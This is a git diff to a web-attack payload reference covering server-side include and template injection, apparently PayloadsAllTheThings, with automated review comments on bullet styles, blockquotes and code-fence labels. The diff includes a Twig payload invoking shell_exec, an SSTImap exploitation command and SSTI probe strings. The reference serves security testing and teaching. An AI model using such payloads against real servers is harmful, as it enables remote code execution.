diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md index 5880147e..98268579 100644 --- a/Server Side Include Injection/README.md +++ b/Server Side Include Injection/README.md @@ -11,7 +11,7 @@ ## Tools -- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI` +* [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI` ```bash python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md index 2bd3c484..f261d791 100644 --- a/Server Side Template Injection/Java.md +++ b/Server Side Template Injection/Java.md @@ -54,7 +54,7 @@ ### Java EL - Basic Injection -> Java has multiple Expression Languages using similar syntax. +Java has multiple Expression Languages using similar syntax. > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`. diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index 299bbc18..11caee80 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -167,6 +167,7 @@ $output = $twig > render ( ``` With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases: + ```php {{ {'id':'shell_exec'}|map('call_user_func')|join }} ``` diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 5d7e34a2..1b0b4af7 100644 --- a/Server Side Template Injection/README.md 
+++ b/Server Side Template Injection/README.md @@ -53,9 +53,9 @@ Original research: -- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) -- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) -- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) +* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) +* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) +* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) #### Rendered @@ -117,7 +117,7 @@ ${{<%[%'"}}%\. Common tags to test for SSTI with code evaluation: -``` +```powershell {{ ... }} ${ ... } #{ ... } 
@@ -133,13 +133,13 @@ ${ ... } Rendered SSTI can be checked by using mathematical expressions inside the tags: -``` +```powershell 7 * 7 ``` Error-Based SSTI can be checked by using this payload inside the tags: -``` +```powershell (1/0).zxy.zxy ```
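Review bot: the `-` to `*` bullet change in Server Side Include Injection/README.md (hunk @@ -11,7) and in the "Original research" list of Server Side Template Injection/README.md (hunk @@ -53,9) touches only these two lists, and nothing in the visible patch says why. If the goal is a single bullet style, state that in the commit message and confirm the remaining lists in both files already use `*`, otherwise the files end up with mixed markers.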
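Review bot: in Server Side Template Injection/Java.md (hunk @@ -54,7), removing the `>` from "Java has multiple Expression Languages using similar syntax." leaves the following line, "> Multiple variable expressions can be used, ...", as a lone blockquote, so two related remarks under "Java EL - Basic Injection" now render in different styles. Either unquote both lines or keep both quoted.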
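Review bot: in Server Side Template Injection/PHP.md (hunk @@ -167,6), the fence that the added blank line now precedes is tagged `php`, but its content, `{{ {'id':'shell_exec'}|map('call_user_func')|join }}`, is a Twig expression rather than PHP source. Since the line is being touched anyway, consider a `twig` tag, assuming the renderer has a Twig lexer, so the label matches what the reader is meant to paste into a template.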
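Review bot: the `powershell` tag added to the three fences in Server Side Template Injection/README.md (hunks @@ -117,7 and @@ -133,13) mislabels their content: `{{ ... }}`, `7 * 7` and `(1/0).zxy.zxy` are template-tag probes, not PowerShell. A highlighter may colour `${ ... }` as PowerShell syntax, and readers can mistake the probes for shell commands. If the aim is only to avoid an untagged fence, `text` satisfies that without implying a language.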